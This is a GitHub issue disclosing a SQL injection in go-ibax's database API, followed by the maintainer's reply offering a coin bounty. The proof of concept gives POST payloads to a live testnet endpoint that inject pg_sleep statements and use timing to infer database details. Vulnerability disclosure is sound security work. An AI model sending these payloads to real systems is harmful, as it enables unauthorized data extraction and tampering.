You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
SQL Injection vulnerability in /packages/api/database.go of go-ibax via where parameter allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.This issue affects versions starting from commits on Jul 18, 2020.
Thank you for your interest in our project, the IBAX development community welcomes hardcore developers like you, which is quite exciting for the IBAX network that is working on development and has not really started rolling out yet.
Regarding the few bugs you mentioned, they lie in the interface services provided to the blockchain explorer for the IBAX testnet, which is an old version of the problem and is part of the deprecated useless code that no longer works in the current version. Of course, we will remove this useless code.
Anyway, thank you again for your dedication and help, please contact Yolanda(Telegram:@yolandadadada ) and the IBAX Foundation will reward you with 1000 IBXC (IBAX Native Coin). We hope that good developers like you will continue to follow us and maybe we can work together in the future.
Describe the bug
SQL Injection vulnerability in /packages/api/database.go of go-ibax via where parameter allows attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.This issue affects versions starting from commits on Jul 18, 2020.
file:
go-ibax/packages/api/database.go
Line 189 in 6bac746
commits:
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174
POC:
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData: order=1&where=1=1%3b%3bselect+pg_sleep(10)%3b--&table_name=pg_user&limit=1&page=1
Reproduction
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData:
order=1&where=1=1%3b%3bselect+pg_sleep(10)%3b--&table_name=pg_user&limit=1&page=1
as you can see, when I use
pg_sleep
, the request is delayed 10s.PostData:
order=1&where=1=1%3b%3bselect+case+when((select+length(current_database()))=4)+then+pg_sleep(5)+else+pg_sleep(0)+end%3b--&table_name=pg_user&limit=1&page=1
as you can see, when I use
pg_sleep
to judge the length ofcurrent_database
, it shows 4.System Info
*
Logs
No response
Validations
The text was updated successfully, but these errors were encountered: